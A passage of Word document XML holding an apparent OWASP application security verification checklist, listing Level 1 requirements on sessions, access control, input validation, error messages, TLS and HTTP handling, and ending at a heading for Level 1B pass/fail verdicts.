        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the framework’s default session management control implementation is used by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B8630" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRDefault="000B6B8C" w:rsidP="000B6B8C">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0177DB26" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1EF015" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that sessions are invalidated when the user logs out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED4713" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CC6311" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0161BD" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that sessions timeout after a specified period of inactivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F4BFA" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E29821" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRPr="009107BE" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF2E973" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V3.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all authenticated pages have logout links.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2DB37" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D08FE5" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRPr="009107BE" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642CFF88" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that users can only access URLs for which they possess specific authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53FF37" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A72AFA9" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC98F3A" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that users can only access files for which they possess specific authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88A40D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140A437E" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRPr="009107BE" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CBF829" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V4.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that directory browsing is disabled unless deliberately desired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC305B" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD80FBE" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E0A916" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V4.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that users can only access protected functions for which they possess specific authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3B29F" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA83A87" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRPr="009107BE" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DA32CC" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V4.11 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that direct object references are protected, such that only authorized objects are accessible to each user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB94C0" w14:textId="77777777" w:rsidR="0035074F" w:rsidRDefault="0035074F" w:rsidP="000B6B8C">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E65F04" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD8116B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V5.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that a positive validation pattern is defined and applied to all input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520FE2D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC3E90C" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V5.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all input validation control failures result in input rejection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0765C" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B596AC8" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRPr="009107BE" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40625FCF" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V5.9 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the environment is not susceptible to buffer overflows, or that security controls prevent buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19026A48" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRPr="009107BE" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB41D15" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRPr="009107BE" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CC68B2" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V8.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that that the application does not output error messages containing sensitive data that could assist an attacker, including session id and personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D96C19" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1014E99B" w14:textId="77777777" w:rsidR="00D202DF" w:rsidRPr="009107BE" w:rsidRDefault="00D202DF" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D528FB7" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V9.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all forms containing sensitive information have disabled client side caching, including autocomplete features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33601FFF" w14:textId="77777777" w:rsidR="0035074F" w:rsidRDefault="0035074F" w:rsidP="000B6B8C">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B83C2D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE94936" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V10.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that TLS server certificates have been issued by a trusted CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA85AB" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD6BE13" w14:textId="77777777" w:rsidR="000B6B8C" w:rsidRPr="009107BE" w:rsidRDefault="000B6B8C" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4846A748" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V11.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that every HTTP response contains a content type header specifying a safe character set (e.g., UTF-8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C60D4" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796B7F87" w14:textId="77777777" w:rsidR="00E2101F" w:rsidRDefault="00E2101F" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C084811" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V11.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that redirects do not include unvalidated data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C18EEA" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20947F93" w14:textId="77777777" w:rsidR="00E2101F" w:rsidRPr="009107BE" w:rsidRDefault="00E2101F" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEEF8B3" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">V11.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the application accepts only a defined set of HTTP request methods, such as GET and POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7E41D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2486F465" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L1A.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The verifier shall verify all dynamic scan results using either manual penetration testing or code review. Unverified automated results are not considered to provide any assurance and are not sufficient to qualify for Level 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A8195" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732A287D" w14:textId="77777777" w:rsidR="009944F9" w:rsidRDefault="00B34FB7" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34FB7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33602AD0" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc46402741"/>
      <w:r>
        <w:t>OWASP  Level 1B Pass/Fail Verdicts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
